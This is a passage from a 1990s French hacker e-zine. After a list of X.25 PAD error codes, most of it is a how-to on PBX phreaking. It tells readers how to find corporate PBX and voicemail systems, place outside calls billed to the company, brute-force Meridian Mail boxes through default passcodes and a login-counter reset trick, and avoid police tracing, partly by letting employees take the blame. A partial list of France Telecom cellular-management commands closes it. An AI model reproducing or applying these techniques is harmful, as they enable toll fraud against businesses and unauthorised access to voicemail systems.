etre transmis au serveur appele. Ainsi, dans le paquet d'appel, le serveur recupere le NUI de l'appelant. >Parametres interressants: ========================= Dans le parametre PAD ADDRESS, on a le numero a 9 chiffres TRANSPAC qui correspond au NUA du PAD 8X50. >Liste des LIBs emanant du 8x50: =============================== DTE 00 : Le telsat a lib‚r‚ l'appel 133 : fonction demand‚e non autoris‚e ou mot de passe invalide 09 : Telsat pas prˆt 136 : ligne x25 inactiv‚e 137 : Mn‚monique ind‚finie dans la demande de connexion d'appel abr‚g‚ ou pour une voie fonctionnant en appel automatique. 138 : aucune voie logique disponible sur le Telsat. 139 : mot de passe/NUI requis pour la connexion. 140 : mot de passe/NUI invalide. 142 : appel TACT (test de terminal) non autoris‚ a partir de cette voie. nnn : ne provient pas du Telsat OCC xxx : occup‚ INV xxx : demande de fonction invalide NC xxx : congestion reseau DER xxx : derangement/hs NA xxx : acces interdit NP xxx : ne peut etre obtenu RPE xxx : erreur procedure distante ERR xxx : Erreur procedure locale NRC xxx ou PCV xxx : Facturation PCV refus‚e. INC xxx : destination incompatible NFS xxx : selection rapide non demandee. PAD xxx : le module a lib‚r‚ l'appel suite … une demande du distant. Bonne chasse et bonne chance chers /\/etrunners ++NeurAlien -%!% N0 Way %!%- Volume I, Num‚ro 2, Partie 2.6 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% %% Yet another phine article by EASYHACKER from FFT about %% %% hack'n phreaking on %% %% %% %% PPPPPP BBBBBB XXXX XX %% %% -----> PPPP PP BBBB BB XXXX XX <----- %% %% -----> PPPPPP BBBBBB XXXXX <----- %% %% -----> PPPP BBBB BB XXXX XX <----- %% %% PPPP BBBBBBB XXXX XX %% %% %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% S'il s'agit d'une activite moins interessante que le hack de reseaux en tous genres, le phreaking represente tout de meme le premier secteur d'activite underground. Malheureusement, en France, la plupart de ceux qui se prennent pour des gros phreakers se contentent d'acheter des la call a des fournisseurs qui trouvent la de gros pigeons qui achetent 600 ou 700 balles leur abo au mois. Il est pourtant beaucoup plus amusant de trouver par soi- meme des moyens d'epargner la facture bimestrielle de France Telecons tout en continuant a exercer son activite favorite. Rien que l'autosatisfaction d'en trouver tout seul comme des grands vous absout du lourd peche qu'en est son utilisation. Quels sont les principaux moyens de phreaking dont on dispose (encore) dans nos belles contrees ? Les cartes ? :-)) LAME ! M0NIT0RED ! 0VER ! F0RGET THEM ! La telephonie cellulaire ? Yeah ! Mais faut investir au depart... Les fausses telecartes ? Faut un portable, un coupleur acoustique, un modem de poche, et l'hiver il fait froid dans les cabines, c'est un coup a attraper la creve ! %-[] Les outdials (sur TelNet/TymNet en particulier) ? Si votre acces depasse pas 2400 bauds en 7 bits c'est pas le top pour leecher des warez, et en plus c'est pas global... La bluebox ? La quasi-totalite des commutateurs francais sont des NUMERIS bourres de filtres... Les 2600/2400 sont systematiquement filtres depuis quelques temps et ca m'etonnerai pas que certaines autres frequences ne soient pas filtrees, mais enregistrees. En plus les lignes sont de pietre qualite. Pourquoi ils se prennent la tete ces abrutis de France Telecons vu que ce n'est meme pas eux qui se font baiser dans ce cas ? J'en ai marre, demain je pars vivre au Rwanda... Sortir avec une nana qui bosse au centre de facturation ? A essayer =-* Les box de toutes les couleurs qui consistent a envoyer des frequences qui resteront sans effet ou a sabotter les installations exterieures ? Arretez de regarder la tele... J'ai un pote qui s'est vite fait busted pour s'etre branche sur la ligne du voisin et qui chiale sa reum a Fleury maintenant. Les party-lines privees qui permettent d'appeller n'importe qui pour qu'il vienne se marrer avec nous ? Yep c'est bien sympa mais je n'en connait qu'une, qui semble etre financee par les plus grosses compagnies de telco americaines et europeennes, et je veux bien tailler une pipe a tous les lecteurs de N0 WAY si c'est pas trace a mort (naaaaaaaannnnnn ! c'etait pour rire ! au secours !) Implorer Saint Zlika pour qu'un miracle se produise et que les telco perdent votre dossier ? Arretez le ketchup avec le yaourt %*\ Bien que je ne doute pas un instant que la plupart de ces techniques puissent encore etre utilisees en France, il y a pourtant une autre chose de bien plus pratique et tout aussi efficace, bien que la documentation a ce sujet se soit fait tres discrete, j'ai nomme les PBX (ou PABX pour les chieurs (ou AUT0C0MMUTATEURS dans la langue de moliere et celle de ma copine)). Remarquez que pour une fois le terme francais n'est pas si bete puisque plus court que la signification anglaise de P(A)BX qui est PRIVATE (AUT0MATIC) BRANCH (E)XCHANGE(R). Les lois de l'ethymologies etant inebranlables, un autocommutateur sert a effectuer automatiquement les commutations. En clair, un PBX est un(e) standard(iste) automatique qui vous aiguille sur le poste desire apres avoir compose le numero d'une boite. Les PBX sont souvent couples a des VMB (messageries vocales). Un tel couple remplace aisement quelques standardiste et vous permet, Messieurs les Directeurs d'entreprise, d'optimiser le rendement de vos employes grace a une solution telephonique d'avant-garde. Bon treve de plaisanterie, une PBX peut assumer de nombreuses fonctions; lorsqu'on telephone au standard et que la standardiste prefere vous confier a une machine plutot que de supporter votre mauvaise haleine, vous etes generalement confrontes a un repondeur vous invitant a deposer un message. La a premiere vue c'est un repondeur classique qui vous raccroche au nez avant que vous n'ayez eu le temps de realiser que l'enregistrement etait commence. Fou de rage, vous recherchez dans vos Post-It (tm) le numero de la ligne directe du poste a joindre. Si celui que vous cherchez a joindre est effectivement la et qu'il a la bonne idee de decrocher le telephone, vous pourrez lui dire de se procurer N0 WAY au plus vite et de passer sur mon BBS au lieu de faire semblant de bosser. S'il ne se decide pas a repondre, au bout d'un certain nombre de sonneries, le PBX se reveille et fait office de repondeur vocal pour le poste concerne. Il est quelquefois possible d'envoyer ou de recevoir des faxs de la meme facon. Les employes de la boite peuvent, quant a eux, consulter a tout moment leurs messages a partir de leur poste de travail ou depuis chez eux lorsqu'une vmb est couplee au PBX (75% des cas... La reciproque n'est pas valable). Et comme toute bonne messagerie est en droit de le faire, il est possible d'envoyer et de transferer des messages a n'importe quel autre proprietaire d'un compte sur ladite VMB. Un PBX se vend en fait sous la forme d'une configuration prete a l'emploi comprenant un PC (souvent 386sx25), un ou plusieurs disques durs de grande capacite associes a un streamer ou des cartouches, et d'un genre de modem tres special assurant la commutation automatique sur une ou plusieurs lignes Numeris, ou des reseaux EtherNet ou TCP/IP. Les messages par defaut sont souvent stoques sur CD-R0M. Les softs sont tout cools, sous Windows, et permettent de creer tres facilement l'arborescence de la VMB/PBX a la maniere d'un soft de BBS. Ils peuvent neanmoins se presenter comme un gros standard comme c'est le cas des PBX meridian dont nous parlerons plus bas. Ces derniers ont un avantage certain sur les autres: ils sont beaucoup moins parametrables donc beaucoup plus faciles a hacker (toujours les memes commandes ;-) ) C'est beau la technique... Mais en quoi ca peut nous etre utile de telephoner a une boite dont on a rien a foutre ? Tres simple: lors de la commutation automatique, le PBX utilise le reseau telephonique interne de l'entreprise, compose le numero de poste a obtenir exactement comme si c'etait fait a la main de n'importe quel poste dans la boite, et des que l'appel aboutit, tout ce qui se passe sur cette ligne est retransmi sur la votre. Le resultat est donc le meme que si vous aviez compose le numero du poste a partir d'un autre poste de la boite. 0r, la moindre des gentillesses d'un bon patron est de permettre a ses employes d'appeller un numero exterieur a partir de son poste... Generalement en faisant un indicatif sur un chiffre puis le numero en question. Si cet indicatif n'est pas filtre par le PBX, vous pouvez donc appeller n'importe quel numero pour le prix d'une communication a l'entreprise (ou gratos si c'est un numero vert...). Si le PBX est en France, la qualite de la ligne sera tout bonnement excellente et si la ligne n'est pas en acces restreint, vous pourrez composer n'importe quoi comme si vous le faisiez directement de chez vous (y compris les 36xx et les mobiles qui ne peuvent pas etre appelles de l'etranger). C'est pas le T0P ca ? Toutefois ne soyez pas stupides au point d'appeller le 3644 ou d'autres numeros robots qui peuvent bloquer le PBX (d'ou verification technique et hop grille...) . En fait, il y a deux facons d'utiliser un PBX: soit comme un moyen de telephoner a perpette a moindre frais, auquel cas il grillera au bout de quelques mois, voire quelques semaines comme il se doit, soit comme un moyen de ne pas se faire tracer. Ainsi, le bon plan est de scanner des numeros susceptibles d'etre traces, ou bien de faire de la call ou de la pastel en appelant par un PBX. Interet: le PBX peut durer TRES longtemps (si vous ne composez que des numeros verts il n'y aura aucune consequences sur la facture de la boite et donc aucun controle technique) et vous pouvez passer vos journees en call sans etre trace. Evidemment si vous possedez vous-meme une ligne numeris et une sous-adresse, courrez demander la non-identification d'appel avant de caller un PBX par cette ligne ! Evitez de changer des codes ou d'envoyer des messages dans la VMB si vous comptez profiter du PBX, vous eviterez d'en ecourter betement la duree de vie. Amusez-vous a ca sur des messageries qui ne possedent pas de fonction PBX interessante. (I) -=)> Comment trouver un PBX ? <(=- -------------------------------------- En ce qui concerne celles en 05, il n'y a pas vraiment de regle pour tomber sur des numeros existants. Essayez tout de meme les numeros de la forme 05 wx yz yz, 05 xy 05 xy, 05 xy zx yz et 05 xy zz zz. N'oubliez pas qu'un PBX peut ne pas etre en service pendant les heures de boulot. Le meilleur moment pour scanner du PBX est donc la nuit, ce qui reduit de plus le nombre de chances de tomber sur une gentille standardiste, bien que certaines aient une tres jolies voix. Pour distinguer une VMB/PBX d'u simple repondeur, il suffit de s'exciter sur toutes les touches du telephone et de voir si il se passe quelque chose ou pas (en dehors des touches du telephone qui fument). Les PBX en RTC sont beaucoup plus nombreuses que les phree, et peut- etre plus facile a trouver (disons que la chance intervient moins). La demarche a suivre est la suivante: 1) Chercher sur le 11 les numeros du siege d'une boite (ce n'est pas toujours necessaire de s'en tenir aux grosses multinationales, des petites boites possedent aussi des PBX). Dans le cas ou vous trouvez une tripotee de numeros, retenez surtout ceux des lignes Numeris (c'est generalement inscrit RNIS [Numeris] sous le numero). 2) Prenez les numeros trouves un par un. Ils sont de la forme: (z)ab pq cd ef Telephonez alors a ce numero en dehors des heures d'ouvertures. 3 pos- sibilites s'offrent alors: - "Allo ?" : Tout n'est pas perdu, il est possible qu'un PBX se cache sur une autre ligne. - "Putain y en a marre a la fin !" : Tout est perdu, le PBX est grille. - "Biiiiiiiiiip...Biiiiiiiiiiip..." : Le nombre de sonneries avant qu'un PBX decroche est parametrage. Generalement, ca decroche immediatement sur l'acces principal, et apres 5 sonneries lorsqu'on passe par la ligne directe d'un poste. Donc si ca decroche pas au bout de 7 sonneries, lachez l'affaire. - "Bienvenue sur la messagerie trouduchnok" : Yeah ! See above. - "Booooooooooooooooooooooooooooooooooooooo" : Tonalite grave, qui dure plusieurs secondes : acces direct a un brasseur ou au PBX. Alors la aucun message pour vous guider au debut. Dans le meilleur des cas, vous aurez juste a composer directement l'indicatif et le numero a obtenir pour atteindre votre but. Sinon en tapant un peu n'importe quoi vous pouvez tomber sur d'autres choses: fax, "le numero que vous avez demande n'est plus attribue" (attention ce n'est pas toujours celui de France Telecom, mais simplement un message integre au PBX qui signale que le numero de poste que vous demandez n'existe pas !), "il est impossible d'obtenir le numero compose a partir de ce service" (mauvais signe), "suite a des difficultes techniques, votre appel ne peut etre achemine a ce moment-ci" (encore plus mauvais signe), "le poste XXXX ne peut vous repondre pour le moment" (B0N SIGNE: notez le numero du poste en question: il s'agit du numero du poste par defaut [standard] invoque lorsqu'on demande de l'aide. Rappellez en demandant ce poste, vous pouvez tomber sur la tonalite tant attendue), "messagerie trouduc", etc... Lorsque vous avez une VMB a priori sans interet, passez-y tout de meme un peu de temps: la plupart renvoient des messages d'erreurs bidons pour vous decourager alors qu'elles sont tout a fait hackables. - "Bip bip bip bip bip" : Si vous ne savez pas ce qu'est une tonalite d'occupation, retournez vivre dans votre grotte. 0n peut aussi tomber sur des trucs tres curieux comme des reroutages automatiques qui balancent des tonalites pour le moins etonnantes. 3) Pas de chance, ca ne marche pas sur ce numero ? N000000000000N ! Ne le jetez pas ! Essayez maintenant les numeros suivants: (z) ab pq cd cd et (z) ab pq cd 00 Dans beaucoup de cas, vous tomberez sur un Fax ou du vocal. Dans ce cas il n'y a plus grand chose a faire de ce numero, essayez les autres. Si vous tombez sur une tonalite chelou, une VMB ou n'importe quoi qui ne semble toutefois pas etre un PBX, essayez les numeros suivants: [(z) ab pq cd 01, 02 etc... et (z) ab pq cd c(d+1)...] 4) Toujours rien ? S'il s'agit d'une petite boite, mieux vaut abandonner les recherches. Sinon, il va falloir scanner toute l'area. En effet, lorsqu'une entreprise demande une installation telephonique consequente aux telco, les numeros attribues sont T0UJ0URS de la forme: (z) ab pq [NUM] [ER0 D] [E P0] [STE] *T0US* les numeros demandes en meme temps ont donc le meme (z)abpq. Les numeros de standard, fax et pbx etant faits pour etre retenus aisement, je ne saurais que trop vous conseiller de scanner tout ce qui ressemble a: (z) ab pq xy xy et (z) ab pq xy 00 ou 10<= xy <=99 Si vous trouvez quelque chose d'interessant, reportez-vous au 3), sinon lachez l'affaire et essayez les autres numeros. Petite precision: lorsque vous trouvez une VMB simple ou bien un PBX qui est remplace par un operateur en 05, recherchez le numero RTC de la boite sur le 11: vu le prix que coute un PBX, ils ne le mettent pas a la poubelle du jour au lendemain au profit d'une petasse. (II) -=)> Principaux types de PBX <(=- -------------------------------------- Vous avez enfin trouve quelque chose d'interessant ? Bravo ! Mais ce n'est pas fini... Voici une liste des marques proposant des VMB/PBX en France: ACSYS VMB PBX B0ITIER - * ALCATEL VMB PBX B.ou PC X25 ENET TCP/IP - * ASSMANN VMB PBX PC AURAL0G VMB PBX PC AXELC0M VMB PC - AT&T VMB*ou*PBX B.ou PC BULL VMB B.ou PC X25 CSEE VMB*ou*PBX PC DATAP0INT PBX B0ITIER DIGILINE VMB B0ITIER X25 ENET DIN0VA VMB PBX B.ou PC X25 ENET + DISC0F0NE VMB PBX PC - * ELAN INF0RMATIQUE VMB PC - ELVETEL VMB PC - ERC0M VMB PC EUR0V0X VMB PC FERMA VMB PBX B0ITIER X25 ENET + GS4 VMB B.ou PC IBM VMB PBX B0ITIER + INTERV0ICE VMB PBX PC + JS TELEC0M PBX B0ITIER MATRA PBX B0ITIER * MG2 TECHN0L0GIES VMB PC X25 ENET MULTIMEDIA VMB PBX PC - N-S0FT VMB PBX PC X25 NT MERIDIAN VMB PBX B0ITIER * 0CTEL VMB B0ITIER + PH0NETIC VMB PBX PC X25 RACAL SYSTEMS VMB B0ITIER SAT PBX B0ITIER SIEMENS PBX B0ITIER SLITEC VMB PC - S0C0TEL PBX B0ITIER S0PRA VMB PC TELSIS VMB B0ITIER ENET + TG TELEC0M PBX B0ITIER V0CALC0M VMB B0ITIER X25 ENET V0CATEX VMB PC V0X VMB PC VMX VMB B0ITIER X-C0M VMB PC X25 TCP/IP + Comme vous pouvez le voir, un PBX est capable de commuter des liaisons specialisees ou les branches d'un reseau EtherNet ou X25. Ceci fait partie du roles des bons PBX mais ne concerne pas le sujet de cet article. Par consequent, la mention PBX mentionnee dans le tableau ci-dessus designe uniquement l'aptitude a pouvoir appeller automatiquement un poste en RTC a partir de l'exterieur. Les signes (-) marquent les VMB/PBX les plus repandues dans les petites et moyennes entreprises, les signes (+) etant reserves aux PBX haut-de-gamme qui equipent les grosses entreprises. Les (*) designent quant a eux les PBX dont j'ai profite jusqu'a present pour appeller l'exterieur, autrement dit les "valeurs sures" ! Les VMB/PBX les plus repandues dans le monde sont incontestablement les Meridian Mail de Northern Telecom. Elles ont de plus l'avantage d'etre faciles a hacker ;-) Etudions donc tout particulierement ce type de VMB/PBX. (III) -=)> NT Meridian Mail <(=- -------------------------------- 0n les reconnait tres aisement a la voix de la nana qui prononce les messages enregistres et aux messages qui, en dehors du message d'accueil, sont toujours les memes. N'etant pas une solution sur PC et etant cense etre pret a l'utilisation en quelques dizaines de minutes, les VMB meridian offrent toutes les memes commandes et l'arborescence differe tres peu de l'une a l'autre. L'arbo classique est la suivante: lorsque vous appellez, vous etes confrontes a un repondeur des plus classiques, vous laissez votre message et vous vous cassez. Si vous etes un peu curieux, vous tripotez les touches *,0 et # jusqu'a tomber sur le message jouissif: "Vous avez obtenu un service automatise qui vous mettra en relation avec le numero compose. Veuillez entrer le nom ou le numero de la personne desiree suivit de la touche #" En France, et pour rester compatible avec ce que nous avons evoques plus haut (ligne directe=(z)abpq+numero de poste), les numeros de postes (qui sont aussi les numeros des bals sur la VMB) sont sur 4 chiffres. En regle generale, entre 0 et 9 se trouvent des trucs particuliers comme le standard, le fax ou l'acces aux reseaux internes. Le 0 est toujours le standard, ou plus exactement le numero d'aide (car il est possible de le changer comme nous le verrons plus tard). Donc bref quand on a ce message, il suffit de composer le numero du poste puis # et hoplaboum ca dit allo dans l'poste. Si vous preferez une version americaine du "allo", trois cas pos- sibles: 1) Il suffit de faire un indicatif sur un chiffre pour avoir l'exterieur. Cet indicatif est souvent 0,1 ou 9. Suit alors le numero de telephone puis la touche #. Si vous avez le message "Il est impossible d'obtenir ce numero a partir de ce service" c'est pas le bon indicatif, mais ca ne signifie pas pour autant que le PBX est grille. Attention, certaines lignes peuvent etre en acces restreint (interdiction du 19 et du 36). Tiens j'en profite pour ajouter une petite precision importante. Il est possible d'appeller quelqu'un a partir de son nom en faisant 11 puis son nom converti en chiffres (ca se trouve encore sur les telephones ca ?), puis le #. Kewl sauf que si l'indicatif d'outdial est le 1, lorsque vous voulez appeller la province ou l'etranger, ca donne 119 ou 116 et cet abruti de PBX croit que vous voulez appeller quelqu'un par son nom. Les PBX qui choisissent mal leur indicatif sont donc assez limitees, mais ca depanne pour Transpac. 2) L'acces a l'exterieur n'est possible qu'en appellant une ligne de transit, representee par un numero de poste classique. En clair, il faut alors composer un numero de poste sur 4 chiffres, #, et si on tombe sur une tonalite, on peut enfin tester indicatif d'outdial+numero (plus besoin de faire #, tout ce que vous composez est envoye en direct sur la ligne de transit). Ces lignes de transit sont souvent utilisees pour la telesur- veillance informatique (n'esperez pas en trouver le numero sur le 11). 3) Vous n'avez pas trouve la fonction permettant d'appeller automatiquement ce que vous voulez. Tout n'est pas perdu, mais il va falloir faire un petit tour par la messagerie vocale. (IV) -=)> La VMB meridian <(=- ------------------------------ * Acces direct a la VMB (par le numero du standard) Les commandes sont soit sur une digit pour selectionner quelque chose dans le menu en cours, soit sur 2 pour acceder directement a une commande quelconque. Pendant le message d'accueil, il suffit de taper 81 pour acceder a une BAL. Au risque de me repeter, les bals sont sur 4 digits. Par defaut, le code est bien entendu le numero des BALs. Le plus dur au debut est de tomber sur un numero de BAL existante. Scannez d'abord les bals de la forme x100, puis augmentez de 5 en 5 (x105 x110 x115 etc...). Une fois que vous etes logges, vous arrivez a la lecture du courrier. Les commandes possibles sont: 2: lecture du message en cours 4: message precedent 5: ecrire un message 6: messave suivant 9: appelle le poste de l'expediteur Les autres commandes possibles sont: 70: ajout de la mention "URGENT" sur un message 71: repond au message en cours 72: consulter l'envellope du message 73: transfert 74: ??? 76: efface le message 77: supprime le message de tous les destinataires 78: envoi de message dans toutes les bals 79: envoi un message apres son enregistrement Et les commandes se rapportant plus a votre boite qu'aux messages: 80: parametrage VMB 81: reconnexion 82: repondeurs (interne et externe) 83: deconnexion 84: change le mot de passe 85: listes de diffusion 86: acces direct a un message (faire numero du msg + #) 87: annuaire des bals 88: maintenance des bals 89: changement du nom du proprio Certaines commandes etant particulierement interessantes, je vais en detailler quelques unes: 80: permet d'acceder a un menu tres interessant concernant le parametrage global de la VMB. Les differents choix proposes sont: 1: change le numero de l'operateur (lorsqu'on demande de l'aide en tapant 0 ou qu'on se fait jeter apres 3 essais de hack d'une bal). Les digits filtrees sont les memes que lorsqu'on est directos sur le PBX, par consequent les indicatifs qui ne marchaient pas n'ont pas plus de chances de marcher en passant par la. Par contre lorsque la fonction d'appel automatique d'un poste est absente, celle-ci vient a la rescousse. Le numero doit la aussi etre suivi de # et precede de l'indicatif d'outdial. REMETTEZ IMPERATIVEMENT LE NUMER0 DE P0STE PRECEDENT (ca le dit lorsque vous essayez de le modifier) sinan le lendemain matin c'est D0WN !!! :*( 2: modification du message d'accueil (5 pour enregistrer, # pour finir) 3: modification de l'arborescence. J'avoue ne pas avoir capte grand chose a cette fonction (qui m'a pourtant l'air tres interessante), car elle fait references a plein de nombres dont la signification est difficile a trouver sans la doc. Mais j'ai beau avoir pratiquement tout explore, je n'ai pas trouve quoi que ce soit permettant de modifier les indicatifs filtres :-( 81: cette fonction est un bonheur pour pouvoir scanner des codes sans se faire deco. 0n est en effet deco au bout de 3 essais, mais le compteur est remis a zero lorsqu'on se logge. Par consequent, il suffit de faire deux essais, de se logger sous une bal dont on connait le code, de refaire 81 et hop... le compteur est remis a zero et on peut refaire 2 essais avant de se relogger etc... 0n peut ainsi scanner autant de BAL que desire sans jamais se faire deconnecter. ;-) 83: a quoi sert cette fonction ? 85: les listes de diffusions sont tres pratiques pour pouvoir scanner les numeros de bals utilises. Il suffit en effet d'entrer le numero de la liste a creer suivi de #, de faire 5 et hop, la VMB attend les numeros de BALs et vous dit au fur et a mesure si c'est attribue ou non. Attention toutefois: les frequences DTMF ne sont pas pris en compte lorsque le message dit "Il n'y a pas de boite au numero". La signalisation ne reprend qu'apres cette phrase, avant de prononcer le numero de la BAL en question. Donc ne vous precipitez pas sinon ca va systematiquement vous dire que la BAL entree n'existe pas a cause d'une erreur de frappe... Le plus simple pour hacker des BALs est donc de scanner toutes les BALs existantes grace a cette fonction, de tout noter au fur et a mesure, puis de tester celles dont le passe est egal au poste grace a la commande 81. 87: cette fonction est parfois accessible de tous, mais generalement reservee a quelques BALs de niveau de securite superieur. C'est assez lourd car ca vous donne pour chaque numero le nom du proprietaire, la date de la derniere visite, le nombre de messages envoyes, recus, archives et d'autres conneries, mais c'est quand meme une aubaine lorsque cette option est disponible ! 88: cette fonction n'est accessible que par la BAL du service informatique (souvent situe dans les 9000 et ne correspondant pas forcement a un poste en service). Les choix proposes sont les suivants: 1: Informations sur une boite: derniere visite, nom du proprio, etc... 2: Suppression d'une boite: attention: le numero doit etre valide par deux appuis successifs sur la touche #. 3: Reinitialisation d'une boite: cette commande peut s'effectuer sur une BAL en service ou non. Les messages et repondeurs sont effaces, et le code est remis au numero de la BAL. Il n'est malheureusement impossible de modifier le niveau d'une autre BAL ni le filtre des indicatifs a ce point-ci. 89: commande souvent retiree pour des raisons que je n'explique pas encore... * Acces via repondeur personnel Comme j'ai deja du l'expliquer plus haut, lorsqu'on appelle un poste par sa ligne directe (le poste etant equivalent au numero des BALs) et que le correspondant ne repond pas, la VMB se reveille et vous propose de deposer un message. L'acces a la VMB et surtout au PBX reste toutefois possible comme pour le standard: il suffit de faire par exemple 0* pendant la lecture du message pour acceder a l'autocommutage. Interet de passer par la ligne directe d'un poste plutot que par le standard: si vous trouvez le poste de quelqu'un de vacant ou d'absent, vous pouvez utiliser la PBX meme si il y a une operatrice au standard. Ainsi certains PBX ne sont accessible en 05 que la nuit, mais il est possible de s'en servir en journee par ce moyen. Si il y a un operateur au standard 24h/24 et aucun poste vacant 24h/24, il suffit de trouver un poste utilise la nuit et un pour le jour... C'est pourquoi, au risque de me repeter, lorsqu'un PBX grille en 05, il faut imperativement tester les lignes directes, meme si ca revient un peu plus cher, ca depanne bien !!! (V) -=)> Les autres VMB/PBX <(=- -------------------------------- La procedure a suivre pour pouvoir dialer sur d'autres types de PBX est tres variable. Ca peut etre le fait d'ecrire dans la bal [indicatif]+numero, ou bien de taper deux fois l'indicatif puis le numero suivi de # apres avoir entre son numero de BAL. Ca peut etre beaucoup plus complexe suivant l'arbo mise en place. Le seul moyen de distinguer les differentes marques de PBX est a la voix des messages pre-enregistres. Par exemple les VMB dont j'ignore la marque mais ou une belle voix de metisse vous guide n'ont aucune fonction de PBX a ma connaissance. Certaines VMB (Alcatel, Ferma, GS4, Intervoice) permettent aussi de se faire des teleconferences en direct entre plusieurs BALs. Ca permet de se taper des gros delires a 20 connectes simultanes. Lorsque ces VMB sont en numero vert international c'est vraiment le T0P, d'autant plus que certaines (Ex:Etherix) proposent une commande INV0KE qui permet d'appeller n'importe qui a se joindre a vous. (VI) -=)> Conseils d'utilisation <(=- ------------------------------------- FAQ: "les PBX c'est kewl mais... ca craint ?" Les avis sont mitiges: pour certains, c'est 100% sans risque car les PBX permettant d'appeller l'exterieur ne sont pas reconnues par France Telecon et en cas de litige, c'est pour la pomme de la boite et France Telecom ne peut pas donner, meme aux keufs, d'infos concernant les numeros ayant appelle les lignes concernees. Pour d'autres c'est pipobingo, du moment que la boite porte plainte aux keufs, tous les moyens leurs sont accessibles. J'ai bien quelques potes qui se sont fait busted pour phreaking mais mais dans la mesure ou ils faisaient aussi bien de la PBX que de la call ou de la box, il est difficile de savoir ce qui les a grilles exactement, bien que les keufs n'oublierent pas de considerer les PBX dans leurs rapports. FAQ: "vaut-il mieux les utiliser le jour ou la nuit ?" La aussi, les opinions divergent: caller le jour permet d'etre moins suspect sur la liste des appels, caller la nuit permet d'eviter de se faire griller en direct. Pour ma part je raisonne de la facon suivante: si il y a des employes (autre qu'agents de securite) la nuit, mieux vaut caller la nuit: ils pourront etre accuses, et les types qui bossent la nuit ne sont pas des ingenieurs informatique qui sont payes suffisemment gracement pour ne pas avoir a passer de nuits blanches. Dans le cas contraire, j'utilise le PBX uniquement en journee. Si la boite a la meme activite jour et nuit, bien evidemment, votre periode d'appel n'aura aucune consequence. FAQ: "solidite et duree de vie ?" Un PBX de grosse boite est tres solide, on peut etre a 10 en meme temps dessus sans que ca ne limite la duree de vie (essayez avec une carte vous m'en direz des nouvelles). Maintenant il faut savoir que pour une petite boite, si les 1000 F de facture journaliere sont depasses, le centre de prevention de FT se bouge le cul et previent aussitot la boite (j'ai ete temoin d'une lettre a ce sujet dans la boite ou je bossais cet ete). Pour une grosse multinationale il faut deja etre un peu plus gourmand. La duree de vie est difficile a determiner, ca peut flamber en une semaine comme en un an ! Un PBX peut de plus s'arreter quelque temps puis reprendre tout a coup. 0u bien passer du simple indicatif sur une digit en guise d'outdial au coup du numero de la ligne de transit. 0u bien simplement virer l'acces 05 en gardant le PBX sur les lignes RTC. (VII) -=)> Keep on phreaking ! <(=- ----------------------------------- Voila j'espere vous avoir un peu eclaire au sujet de ce fabuleux moyen de phreaking que sont les PBX. Si cela vous permet de trouver des PBX vierges, vous avez gagne le droit de m'en donner les numeros ;-) Quelques greetings... New Id, Evian, EFZ Team, Pak, Disease Factory, Seven Up, Andreas, Voyager, Phantor, FCS, Hackick, Hackline, Joshua, KewlHP, HPReg, Zarkdav, NewTrend, Doctor Byte, ClockWork 0range, Sledge, SkinHead, Real Sniper, Speedy Gonzales, Anixter, Geat, Fortan, Spy Hunter, et a vous pour avoir lu cet article jusqu'au bout (quel courage...) . Vous pouvez me contacter sur: EFZ: 3614/3615 AS-K-AR-0U-ND bal EasyHacker The 0NE BBS: +33-149-887-691 bal EasyHacker RTC-0NE: +33-148-701-029 bal EasyHacker Stampede: +1-813-754-0685 bal EasyDialer The Line aka QSD bal EasyDialer Y0H!BBS: +49-L0-0K-F0-R-IT bal EasyHacker Sectel: +49-N0-T-F0-R-Y0-U bal EasyHacker [NeurAlien: SecTec pas SecTel !!!!] TTGIPTS: +1-303-427-0621 bal EasyDialer HideWay: +1-WH-AT-IS-IT aka Rachid Benzaoui FidoNet: 2:242/260.21 RTEL: :-)) pas RTEL ! :-? Your, EasyHacker / F.F.T for N0 WAY issue 2 [Federation of Free Traders aka Fuck France Telecom !!!] -%!% N0 Way %!%- Volume I, Num‚ro 2, Partie 2.7 Cet article est un article de CORE-DUMP, journal Underground Hacker jamais diffuse publiquement. (regardez la date!!!!) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = CORE-DUMP | Volume I | Issue 2 | Phile 2 | [NeurAlien] 28/05/92 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= <--==*==-->---------------------------------<--==*==--> <--==*==--> FT's Operating System <--==*==--> <--==*==--> for <--==*==--> <--==*==--> Cellular Telephone Managing <--==*==--> <--==*==--> By NeurAlien <--==*==--> <--==*==-->---------------------------------<--==*==--> Intro: ----- J'ai rassembl‚ ici tout ce que je savais sur le systˆme de gestion du t‚l‚phone cellulaire par France Telecom. Je ne connais pas du tout ce systeme etant donne que je ne travaille pas a France Telecom ;) Si un jour vous tombez sur un systeme comme ca, faites moi une H-Phile pour CORE-DUMP en expliquant le fonctionnement complet du systeme. Et vive la libre circulation de l'information. Organisation du R2000: --------------------- Le R2000 (RADIOCOM 2000) est le t‚l‚phone cellulaire analogique Francais fait par France Telecom. Les frequences de transmission sont de 400 MHz … 440 MHz. Elles sont organisees en BdF (Bandes de frequences???). Ce sont des NRL (Relai) qui, connect‚s … des centres FT avec op‚rateurs grƒce … des modems 300 bauds, gerent la transmission des informations de routage et de taxation. Aux UGR (lien avec le RTC), il y a des CGM qui gŠrent les mobiles et leur routage. Mat‚riel: -------- o Partie telecommunication, FT utilise les mat‚riels suivants: MATRACOM 6500 (et par celui ci, du x25 s‚maphore) MT25 (autocomm) E10 (autocomm) o Partie gestion informatique: BULL C'est sur ce dernier point que je vais m'attarder. Apparemment, FT utilise des Bull DPS en reseau x25 et avec des modems branch‚s sur le RTC (pour la relation avec les NRL). Ils utilisent donc certainnement le systˆme d'exploitation GECOS de Bull mais aussi un logiciel de MATRA (CGM) pour la gestion donc des taxes et de l'activit‚ reseau. Il est possible que le nom CGM provienne de Centre de Gestion des Mobiles. il en est … sa version 8.5. Logiciel MATRA: -------------- Je vous met ici une liste de commandes qui devraient normalement marcher sur le logiciel de MATRA (CGM). Certainnes n'ont aucune explication donc il vaudrait mieux demander de l'aide en ligne la dessus. Commandes: TTA:BAN= : archivage des taxes. CHANDI : transfert de fichier AAE : Commande d'‚dition de l'anneau des alarmes 